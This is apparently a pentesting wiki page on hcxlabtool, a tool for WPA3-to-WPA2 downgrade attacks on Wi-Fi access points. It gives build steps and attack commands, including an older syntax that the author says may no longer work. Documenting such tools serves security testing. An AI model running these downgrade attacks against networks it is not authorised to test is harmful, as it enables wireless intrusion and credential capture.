# hcxlabtool
This is an awesome [tool](https://github.com/ZerBea/wifi_laboratory) for doing WPA3 downgrade attacks!  Booyah!

*Referenced from: [this GitHub discusson](https://github.com/ZerBea/hcxdumptool/discussions/485)*

:::tip
You might just want to try using [pentesting/Wifi/dragonshift](DragonShift) as an alternative to this tool.
:::

## Install pre-reqs and compile
```
git clone https://github.com/ZerBea/wifi_laboratory.git ~/wifilab
cd ~/wifilab
sudo apt install build-essential git libpcap-dev -y
make
```

## Attack a list of APs to see if they're vulnerable to a WPA3>WPA2 downgrade attack

```
sudo ./hcxlabtool p phy0 s 15 e ../wifi_laboratory-main/ap.list f 23b
```

Where:
* `p phy0` is the name of the physical interface
* `s 15` is the stay time in seconds`
* `e ap.list` is the list of AP names to attack
* `f 23b` is the channel and band to attack

:::danger
I'm not sure the syntax above actually works.  It seems this tool kind of went into "shields up" mode.  The [repo](https://github.com/ZerBea/wifi_laboratory) says "Do not report issues or feature requests."  

Below is the *old* command syntax I had up for a long time, but at the time of this page's update (2025-12-04) it looks like the syntax has totally changed so I don't think the info below is relevant:
```
sudo hcxlabtool --rds=1 --essidlist list-of-wpa3-aps.list -t 15 -c23b
```
:::

## Additional resources
*More information about this attack [here](https://trustedsec.com/blog/the-dangers-of-transition-mode)*.  We also did a YouTube video on this downgrade attack [here](https://www.youtube.com/watch?v=VEaPuFwqQ7U).